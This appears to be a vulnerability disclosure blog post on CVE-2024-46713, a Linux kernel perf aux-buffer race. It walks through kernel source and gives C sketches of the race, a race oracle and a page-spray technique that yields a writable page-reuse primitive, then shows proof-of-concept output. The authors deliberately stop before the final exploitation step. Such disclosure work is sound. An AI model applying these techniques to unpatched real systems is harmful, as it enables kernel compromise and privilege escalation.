Foreword:
We disclosed this vulnerability to the kernel security team through responsible disclosure (CVE-2024-46713). The patch on the mailing list is visible here.
We are publishing the vulnerability to demonstrate that it is fully exploitable and to ensure that the technical details are available.
The vulnerability seems to have been introduced in the 4.1 kernel, when aux buffers were added to perf events. This makes it roughly 9 years old.
The proof of concept (PoC) in this blog post was only tested on 6.x kernel versions, but should be transferable to older kernel versions as well.
We will demonstrate that the vulnerability is exploitable on a pre-patch vanilla kernel.
However, the exploit strategy described in this blog post does not work on any major distributions.
In particular, as long as check_pages_enabled is true, the exploit strategy laid out in this blog post will not work.
This is the case if init_on_alloc, page poisoning, init_on_free, CONFIG_DEBUG_PAGEALLOC or CONFIG_DEBUG_VM are enabled.
The vulnerability itself does affect major distributions, but we are not publishing a blueprint for how to perform that exploit.
Debian-based distributions, as well as Android and any virtual machines are not affected.
The rest of this blog post concerns the technical details of the bug and how to exploit it.
What are perf events?
perf_events is a kernel subsystem intended for performance measurement of various aspects of a system. struct perf_event objects can be created with the perf_event_open syscall. Each type of event is provided by a PMU (performance monitoring unit).
The struct perf_event is returned to the user mode process as a file descriptor.
Each event can have an associated struct perf_buffer ringbuffer, which is called rb on the event struct. This ringbuffer can either be created by mmaping an event that doesn’t currently have an rb, or a different event’s ringbuffer can be assigned to rb through the PERF_EVENT_IOC_SET_OUTPUT ioctl.
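To make this concrete, here is a minimal sketch of opening an event from user space. The attr configuration and the open_dummy_event helper name are just illustrative assumptions, not what the PoC uses:
#include <linux/perf_event.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* glibc provides no wrapper for perf_event_open, so call the syscall directly. */
static int perf_event_open(struct perf_event_attr *attr, pid_t pid,
                           int cpu, int group_fd, unsigned long flags)
{
    return syscall(SYS_perf_event_open, attr, pid, cpu, group_fd, flags);
}

static int open_dummy_event(void)
{
    struct perf_event_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.type = PERF_TYPE_SOFTWARE;        /* example: a software PMU */
    attr.size = sizeof(attr);
    attr.config = PERF_COUNT_SW_DUMMY;
    /* The struct perf_event is returned as a file descriptor. */
    return perf_event_open(&attr, 0, -1, -1, 0);
}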
perf_buffer struct
The struct perf_buffer data structure is used to keep track of the memory of a buffer as well as multiple counters. perf_buffer, ring buffer and rb are used interchangeably throughout the writeup.
struct perf_buffer {
refcount_t refcount;
/*[...] Snip for length*/
int nr_pages; /* nr of data pages */
/*[...] Snip for length*/
/* poll crap */
spinlock_t event_lock;
struct list_head event_list;
atomic_t mmap_count;
unsigned long mmap_locked;
struct user_struct *mmap_user;
/* AUX area */
/*[...] Snip for length*/
unsigned long aux_pgoff;
int aux_nr_pages;
int aux_overwrite;
atomic_t aux_mmap_count;
/*[...] Snip for length*/
refcount_t aux_refcount;
int aux_in_sampling;
void **aux_pages;
void *aux_priv;
struct perf_event_mmap_page *user_page;
void *data_pages[];
};
Most of the fields are self-explanatory, so we will just give brief additional information on the ones that are relevant for this post.
- mmap_count keeps track of how many vmas map an event that has this buffer.
- aux_nr_pages is also used to check if the perf_buffer has an aux buffer.
- aux_mmap_count keeps track of how many vmas map an event that has this aux buffer.
- user_page points to a special page that user space can write to, to communicate ring buffer state and configuration.
Creating a ring buffer
To create an rb on an event, the event must be mmaped.
The mmap call then executes perf_mmap, which will perform some checks on the arguments and, if those pass, eventually call rb_alloc.
Specifically we need that pg_off==0 and that the number of pages we are asking for is one page larger than a power of two.
It should be noted that the vma is a mapping of the struct perf_event and not of the struct perf_buffer. The mapped memory starts with the mapping of the user_page and is followed by the data pages.
If an rb already exists, a new struct perf_buffer is not created and rb->mmap_count is incremented instead.
This mmap_count variable keeps track of how many vmas exist that reference this ring buffer; once it reaches zero, a reference on the ring buffer is dropped and it will likely be freed.
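As a sketch, creating the ring buffer just means mmaping the event fd (for example one returned by the hypothetical open_dummy_event above) at offset 0 with 1 + 2^n pages:
#include <sys/mman.h>
#include <unistd.h>

/* Map the user_page plus 2^order data pages of an event.
 * fd is an event fd as returned by perf_event_open; no error handling. */
static void *map_ring_buffer(int fd, unsigned int order)
{
    size_t page = sysconf(_SC_PAGESIZE);
    size_t size = (1 + (1UL << order)) * page;  /* user_page + 2^order data pages */

    /* pg_off == 0 selects the normal (non-aux) ring buffer. */
    return mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
}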
Aux buffers
For some PMUs, ring buffers can have an additional auxiliary (aux) buffer. The aux buffer information is embedded in the perf_buffer struct.
The aux fields of the rb are prefixed with aux_ to distinguish them.
To create an aux buffer, its parameters must first be configured using the user_page (namely aux_offset and aux_size) and it can then be mmaped with the configured offset and size.
There are additional checks in place to make sure the aux buffer and the original buffer don’t overlap.
If all checks pass, the aux buffer values are set up by rb_alloc_aux.
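A rough sketch of that sequence from user space, assuming rb_base is the mapping returned by the map_ring_buffer sketch above and the event's PMU actually supports aux data:
#include <linux/perf_event.h>
#include <sys/mman.h>
#include <unistd.h>

/* Configure and map an aux buffer behind an already mapped ring buffer.
 * rb_pages is the size of the existing rb mapping in pages (1 + 2^n);
 * the kernel applies further checks on the offset and size. */
static void *map_aux_buffer(int fd, void *rb_base, size_t rb_pages,
                            size_t aux_pages)
{
    size_t page = sysconf(_SC_PAGESIZE);
    struct perf_event_mmap_page *up = rb_base;  /* the user_page */

    /* Tell the kernel where the aux area should live and how big it is. */
    up->aux_offset = rb_pages * page;           /* directly behind the rb */
    up->aux_size = aux_pages * page;

    /* The mmap offset must match the configured aux_offset. */
    return mmap(NULL, up->aux_size, PROT_READ, MAP_SHARED, fd, up->aux_offset);
}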
What can you do with a perf_event and ringbuffers
A perf_event fd has the following interactions with ringbuffers.
- mmap
  - Create a perf_buffer rb if the event doesn’t have an rb already and pgoff==0.
  - Map an existing perf_buffer rb if the event already has an rb and the mmap request matches it.
  - Create an aux buffer for the rb if the user_page has set it up and pgoff matches the configured aux_offset.
  - Map an existing aux buffer, if the rb already has an aux buffer and the mmap request matches it.
- ioctl
  - Assign another event’s perf_buffer to self, if own event->mmap_count is 0 (see the sketch after this list).
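As a sketch, forwarding one event's output to another event's ring buffer looks like this (fd1 already has an rb, fd2 has no mappings yet):
#include <linux/perf_event.h>
#include <sys/ioctl.h>

/* Make event2 use event1's ring buffer as its output.
 * Only allowed while event2's own mmap_count is 0. */
static int redirect_output(int fd2, int fd1)
{
    return ioctl(fd2, PERF_EVENT_IOC_SET_OUTPUT, fd1);
}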
event->mmap_mutex
The vma stores a reference to a struct perf_event, which in turn points to a struct perf_buffer, which is called rb in the code below.
When the vma is closed, the function perf_mmap_close is called. In it, the code keeps track of what has been closed and adjusts the appropriate counters.
Below is an excerpt of how aux buffers are handled.
if (rb_has_aux(rb) && vma->vm_pgoff == rb->aux_pgoff &&
atomic_dec_and_mutex_lock(&rb->aux_mmap_count, &event->mmap_mutex)) {
/*[...] Snip for length */
/* this has to be the last one */
rb_free_aux(rb);
WARN_ON_ONCE(refcount_read(&rb->aux_refcount));
mutex_unlock(&event->mmap_mutex);
}
rb_has_aux(rb) simply checks if rb->aux_nr_pages != 0.
Then, if vma->vm_pgoff == rb->aux_pgoff, the rb->aux_mmap_count is decremented and the event->mmap_mutex lock is taken if it reached 0.
While the lock is taken, some counters are adjusted and eventually rb_free_aux is called, which will free all of the memory associated with the aux buffer.
The issue
The problem is that the lock that is taken is on the event rather than on the rb.
Since multiple events can point to the same struct perf_buffer, the event->mmap_mutex does not actually prevent concurrent accesses to the rb.
In the case of the rb itself this turns out not to be an issue, because you can only forward to a buffer that already exists. But this is not the case for the aux buffer.
What can we do with it
To get an idea of how we can use this issue to our advantage, let’s take a closer look at perf_mmap. I’ll provide multiple code snippets to walk you through the logic.
static int perf_mmap(struct file *file, struct vm_area_struct *vma)
{
struct perf_event *event = file->private_data;
unsigned long user_locked, user_lock_limit;
struct user_struct *user = current_user();
struct perf_buffer *rb = NULL;
/* [...] Snip for length*/
vma_size = vma->vm_end - vma->vm_start;
if (vma->vm_pgoff == 0) {
nr_pages = (vma_size / PAGE_SIZE) - 1;
} else {
/*
* AUX area mapping: if rb->aux_nr_pages != 0, it's already
* mapped, all subsequent mappings should have the same size
* and offset. Must be above the normal perf buffer.
*/
u64 aux_offset, aux_size;
if (!event->rb)
return -EINVAL;
If the requested vm_pgoff isn’t 0 we assume that it’s a request for an aux buffer. We can only create an aux buffer if an rb already exists.
nr_pages = vma_size / PAGE_SIZE;
mutex_lock(&event->mmap_mutex);
ret = -EINVAL;
rb = event->rb;
if (!rb)
goto aux_unlock;
We calculate the number of pages and then take the event->mmap_mutex lock. Afterwards we check if the event still has an rb. We then assign it to the local rb variable; this is important for a case distinction later in the code.
aux_offset = READ_ONCE(rb->user_page->aux_offset);
aux_size = READ_ONCE(rb->user_page->aux_size);
if (aux_offset < perf_data_size(rb) + PAGE_SIZE)
goto aux_unlock;
We get the configured parameters from the user page and we check that the configured offset is actually behind the already existing buffer.
/*[...] Snipped a bunch of mundane checks on the pg_off and size*/
if (!atomic_inc_not_zero(&rb->mmap_count))
goto aux_unlock;
if (rb_has_aux(rb)) {
atomic_inc(&rb->aux_mmap_count);
ret = 0;
goto unlock;
}
We increment the rb->mmap_count and, if there already is an aux buffer, we increment rb->aux_mmap_count and return.
atomic_set(&rb->aux_mmap_count, 1);
user_extra = nr_pages;
goto accounting;
}
If there isn’t an aux buffer already, we set rb->aux_mmap_count to 1 and jump forward.
/*[...]Snip rb stuff before accounting label*/
/*[...]Snip a bunch of rlimit checking to make sure we are allowed to reserve that amount of memory*/
if (!rb) {
/*[...] Snip rb setup code*/
} else {
ret = rb_alloc_aux(rb, event, vma->vm_pgoff, nr_pages,
event->attr.aux_watermark, flags);
if (!ret)
rb->aux_mmap_locked = extra;
}
This is the case distinction mentioned earlier.
Because the local rb variable is set, we are calling rb_alloc_aux to create an aux buffer.
The rest of the function just increments event->mmap_count and sets up the vma flags and vm_ops.
Because all of this is only protected by the event->mmap_mutex, we can execute it concurrently through a second event that shares the same rb.
Getting an “orphaned” aux vma
Our first goal is to get a vma that has the correct size and pgoff to be an aux buffer, while aux_nr_pages is zero.
Note that we can’t do the race in the same process, since the mm->mmap_lock is held during mmap.
But we can simply fork into a new process and race from there.
If we mmap an existing aux buffer it will just increment rb->aux_mmap_count and succeed. The way that perf_mmap checks if there already is an aux buffer is by checking if aux_nr_pages is not zero.
If we take a quick look at __rb_free_aux, it goes through all pages and frees them and only sets aux_nr_pages to zero at the very end.
static void __rb_free_aux(struct perf_buffer *rb)
{
/*[...] Snip for length*/
if (rb->aux_nr_pages) {
for (pg = 0; pg < rb->aux_nr_pages; pg++)
rb_free_aux_page(rb, pg);
kfree(rb->aux_pages);
rb->aux_nr_pages = 0;
}
}
Because it goes through all of the pages first, we can make the time that __rb_free_aux is in flight almost arbitrarily large.
That means that we can race perf_mmap_close of the aux buffer against perf_mmap.
If perf_mmap_close reduces rb->aux_mmap_count to 0 it will call __rb_free_aux. But perf_mmap doesn’t check if rb->aux_mmap_count is zero and will just increment the refcount as long as rb->aux_nr_pages is not zero.
If we win the race we will have a vma with an aux buffer pgoff, even though rb->aux_nr_pages has been set to 0.
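To make the shape of the race concrete, here is a rough sketch of the two sides. The helper names are hypothetical and the timing is found with the oracle described in the next section; the real PoC keeps the child alive so it can keep using the orphaned vma:
#include <sys/mman.h>
#include <unistd.h>

/* Sketch of the stage-1 race, assuming:
 *   - event1 has an rb and a mapped aux buffer at aux_off/aux_size
 *   - event2 was redirected to event1's rb via PERF_EVENT_IOC_SET_OUTPUT
 *   - aux_map is the parent's mapping of event1's aux buffer */
static void race_once(int event2_fd, void *aux_map, size_t aux_size,
                      unsigned long aux_off)
{
    if (fork() == 0) {
        /* Child: map the aux area through event2 while the parent tears it
         * down.  If we win, this vma ends up "orphaned". */
        void *orphan = mmap(NULL, aux_size, PROT_READ, MAP_SHARED,
                            event2_fd, aux_off);
        (void)orphan;   /* the real PoC keeps and uses this mapping */
        _exit(0);
    }
    /* Parent: drop the last aux mapping, driving aux_mmap_count to 0 and
     * triggering __rb_free_aux while the child's mmap races against it. */
    munmap(aux_map, aux_size);
}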
Race Oracle
With a little bit of trickery we can determine if we were too early or too late or if we just won the race.
To do this we need the following setup:
event1
- supports aux
- already has an rb
- already has an aux buffer
event2
- does not support aux
- forwarded to event1’s rb
We will race the mmap of event2 against the munmap of the aux buffer of event1.
If we are too early, then event2 increments rb->aux_mmap_count before perf_mmap_close decrements it, so the aux buffer is never freed. So our mmap succeeds.
If we are too late, then rb->aux_nr_pages was already 0 and event2 will try to create an aux buffer, and mmap will fail with -EOPNOTSUPP.
If we win the race, then our mmap succeeds just like in the too early case, but if we try to access any of the memory in the vma we will get a SIGBUS, since the aux buffer isn’t backed by memory.
So our oracle works like this:
If mmap fails, we were too late.
If mmap succeeds, we wait a little bit, to make sure that __rb_free_aux has finished running.
If we then try to access the mapped vma’s memory and it succeeds, we were too early.
But if it fails with SIGBUS, we won the race.
Because we have an oracle we can very reliably find the correct timing for the race condition.
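A simplified sketch of that oracle in code, assuming aux_map is the mapping the child just attempted and probe_addr points into it (the real PoC handles the SIGBUS more carefully):
#include <setjmp.h>
#include <signal.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

static sigjmp_buf jb;

static void sigbus_handler(int sig)
{
    (void)sig;
    siglongjmp(jb, 1);
}

/* Returns -1 = too late, 0 = too early, 1 = won the race. */
static int race_oracle(void *aux_map, volatile char *probe_addr)
{
    struct sigaction sa;

    if (aux_map == MAP_FAILED)
        return -1;                 /* mmap failed: we were too late */

    usleep(10000);                 /* let __rb_free_aux finish */

    memset(&sa, 0, sizeof(sa));
    sa.sa_handler = sigbus_handler;
    sigaction(SIGBUS, &sa, NULL);

    if (sigsetjmp(jb, 1))
        return 1;                  /* SIGBUS: we won the race */

    (void)*probe_addr;             /* fault a page in */
    return 0;                      /* access worked: we were too early */
}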
What do we gain from the “orphaned” vma?
Let’s first take a quick look at perf_mmap_fault. This is the fault handler that is responsible for handling page faults in the perf_event vmas.
static vm_fault_t perf_mmap_fault(struct vm_fault *vmf)
{
struct perf_event *event = vmf->vma->vm_file->private_data;
struct perf_buffer *rb;
vm_fault_t ret = VM_FAULT_SIGBUS;
/*[...] Snip some code related to write protecting vma pages*/
rcu_read_lock();
rb = rcu_dereference(event->rb);
if (!rb)
goto unlock;
vmf->page = perf_mmap_to_page(rb, vmf->pgoff);
if (!vmf->page)
goto unlock;
get_page(vmf->page);
vmf->page->mapping = vmf->vma->vm_file->f_mapping;
vmf->page->index = vmf->pgoff;
ret = 0;
/*[...]Snip rcu_unlock*/
return ret;
}
The page fault handler basically looks up the associated page of the buffer and then inserts it into the vma. You may have noticed that it doesn’t take any locks associated with the rb.
Here is the perf_mmap_to_page function.
struct page *
perf_mmap_to_page(struct perf_buffer *rb, unsigned long pgoff)
{
if (rb->aux_nr_pages) {
/* above AUX space */
if (pgoff > rb->aux_pgoff + rb->aux_nr_pages)
return NULL;
/* AUX space */
if (pgoff >= rb->aux_pgoff) {
int aux_pgoff = array_index_nospec(pgoff - rb->aux_pgoff, rb->aux_nr_pages);
return virt_to_page(rb->aux_pages[aux_pgoff]);
}
}
return __perf_mmap_to_page(rb, pgoff);
}
You can see that as long as rb->aux_nr_pages isn’t zero, we can still access the aux buffer pages.
In particular we can still fault pages into our vma while (or even after) __rb_free_aux is returning them to the page allocator.
This wouldn’t normally be a problem, since we can’t fault in aux buffer pages if we don’t have a vma that corresponds to the aux buffer. And the aux buffer should only be freed if rb->aux_mmap_count becomes zero.
But because of our orphaned aux buffer vma we now have a vma that has the correct pgoff to access the aux buffer but isn’t accounted for by rb->aux_mmap_count.
(Well, it technically is accounted for at this stage. But as soon as we create a new aux buffer – which we can do because aux_nr_pages is zero – it will set aux_mmap_count back to 1, making the orphaned vma unaccounted for.)
Stealing pages
By racing against the freeing of the pages we are able to get several pages mapped in our process that have already been returned to the page allocator. This means we already have a page reuse primitive at this stage. The problem is that we aren’t allowed to write to any of the pages in an aux buffer.
But since we are allowed to write to the user page, we can spray perf_buffers that consist of just one page – the user page.
We already know that it is available, since we used it earlier and it has the same allocation flags as the aux buffer page allocation, so it is likely that we will receive (at least some of) the same pages that were just returned to the page allocator.
The pages that get returned will be initialized and will have their refcount reset to 1.
The spray is very nice, because we can simply fill each freshly allocated user page with data and then scan all of the “stolen” pages to work out if we found a match and which stolen page it corresponds to.
And we can repeat this process as often as needed.
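A rough sketch of that spray-and-scan loop, assuming open_dummy_event from earlier and stolen[] holding pointers to pages that are still mapped through the orphaned aux vma (the counts, offsets and marker values are illustrative, not the PoC’s):
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#define SPRAY_COUNT 64

/* Spray single-page ring buffers (just the user_page) and look for one of
 * them showing up in a page we still see through the orphaned aux mapping. */
static void *spray_and_scan(uint8_t **stolen, size_t nr_stolen)
{
    size_t page = sysconf(_SC_PAGESIZE);
    void *sprayed[SPRAY_COUNT];

    for (int i = 0; i < SPRAY_COUNT; i++) {
        int fd = open_dummy_event();
        /* One page total: only the user_page gets allocated for this rb. */
        sprayed[i] = mmap(NULL, page, PROT_READ | PROT_WRITE,
                          MAP_SHARED, fd, 0);
        /* Tag the page so we can recognize it through a stolen mapping. */
        memset((uint8_t *)sprayed[i] + page / 2, 0x41 + i, 16);
    }

    for (size_t j = 0; j < nr_stolen; j++)
        for (int i = 0; i < SPRAY_COUNT; i++)
            if (stolen[j][page / 2] == (uint8_t)(0x41 + i))
                return sprayed[i];  /* writable view of a stolen page */

    return NULL;                    /* no overlap yet, spray again */
}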
Once we have found enough pages, we then remove them from the readonly orphaned aux buffer mapping and can unmap the user page in our spray with madvise MADV_DONTNEED.
Using madvise lets us remove the page from the vma mapping without closing the vma.
This will drop the refcount of the page back to zero, because it was reset to 1 when it was allocated for our user page.
Because the refcount dropped to zero, the page is returned to the page allocator once again – even though we still have a reference to it – but this time it is writable.
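Sketched in code, with user_page_map being a sprayed user page that turned out to overlap a stolen page (and after that page has already been removed from the orphaned aux mapping):
#include <sys/mman.h>
#include <unistd.h>

/* Drop the user page from the spray vma without closing the vma.  Its
 * refcount was reset to 1 when it was allocated as our user_page, so it
 * now falls back to zero and the page goes back to the page allocator. */
static void release_user_page(void *user_page_map)
{
    madvise(user_page_map, sysconf(_SC_PAGESIZE), MADV_DONTNEED);
}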
At this stage we have a writable page reuse primitive.
We can now spray kernel objects and if they end up in our page we have full control over them.
The rest of the exploit is neither interesting nor specific to this vulnerability, so we will stop here.
Why it doesn’t work on most distros
On most (or even all) distributions this strategy doesn’t work. If check_pages_enabled is true, the page allocator will perform several sanity checks for every page it returns. And the pages that we “stole” have a non-zero refcount.
This is what that looks like:
Aug 05 11:59:33 archlinux kernel: BUG: Bad page map in process exploit pte:8000000378b4f025 pmd:3bb7ff067
Aug 05 11:59:33 archlinux kernel: page: refcount:1 mapcount:-1 mapping:00000000dbe5efca index:0x751 pfn:0x378b4f
Aug 05 11:59:33 archlinux kernel: aops:anon_aops.0 ino:836 dentry name:"inotify"
Aug 05 11:59:33 archlinux kernel: flags: 0x2ffff8000000004(referenced|node=0|zone=2|lastcpupid=0x1ffff)
Aug 05 11:59:33 archlinux kernel: raw: 02ffff8000000004 dead000000000100 dead000000000122 ffff975cc0585d50
Aug 05 11:59:33 archlinux kernel: raw: 0000000000000751 0000000000000000 00000001fffffffe 0000000000000000
Aug 05 11:59:33 archlinux kernel: page dumped because: bad pte
In that case the page allocator will skip over any pages that don’t pass the sanity checks, so the stolen pages will never be returned by the page allocator for any allocation.
It is possible to get around this in a scenario where another process allocates the page in the time window between the page being returned by __rb_free_aux and us stealing the page. But in that case the refcount never becomes zero, so we cannot perform the pivot to a writable mapping, most likely making it only a KASLR bypass.
Demo
But on a fresh vanilla kernel compiled with a default config these checks are not enabled.
Below you can see the output of our proof of concept.
/ # /mnt/host/exploit
[+] Opening event fd
[+] Found aux mappable pmu: t=1, c=2
[+] Opened event fds
[+] redirected event2->event1
[P] Started
[C] Started
[C] Won stage 1 race
[C] Unmap Fault Started
[P] Unmap Started
[C] Won stage 2 race
[C] Caught sigbus, correcting offset
[P] Starting the spray
[C] Scanning 2339 pages, range 0x7fcb1d263000-0x7fcb1db86000
[C] Unmapping readable pages with writable counterpart
[P] Found 33 writable page(s) in 49 iterations
[C] Spinning
[P] Doing refcount manipulation
[P] Checking for change and spraying
[P] Writable page changed
dump@0x7fcb1db46000
dump: +0000: 0000000000000000000000000000000010FFFF42FFFFFFFF10FFFF42FFFFFFFF000000000000000028FFFF42FFFFFFFF28FFFF42FFFFFFFF0000000000000000
dump: +0040: 40FFFF42FFFFFFFF40FFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
dump: +0080: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
dump: +00c0: 00000000000000000000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000
dump: +0100: 00FFFF42FFFFFFFF00FFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
dump: +0140: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
dump: +0180: 00000000000000000000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000
dump: +01c0: FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
dump: +0200: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
dump: +0240: 0000000000000000000000000000000050FFFF42FFFFFFFF50FFFF42FFFFFFFF000000000000000068FFFF42FFFFFFFF68FFFF42FFFFFFFF0000000000000000
dump: +0280: FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
dump: +02c0: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
dump: +0300: 0000000000000000000000000000000010FFFF42FFFFFFFF10FFFF42FFFFFFFF000000000000000028FFFF42FFFFFFFF28FFFF42FFFFFFFF0000000000000000
dump: +0340: 40FFFF42FFFFFFFF40FFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
dump: +0380: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
dump: +03c0: 00000000000000000000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000
[P] Main thread done
[P] Spinning
Try it yourself
The PoC described in this blog post can be found here.
If you plan to experiment with this bug, it is HIGHLY recommended to patch the kernel so that you can do so in a virtual machine. You will most likely completely freeze the kernel if anything goes wrong with your exploit.
Your virtual machine should have at least 2 CPU cores, so that the race can happen concurrently.
Written by Nils Ole Timm, @Firzen14
Linux Team Security Researcher
Binary Gecko GmbH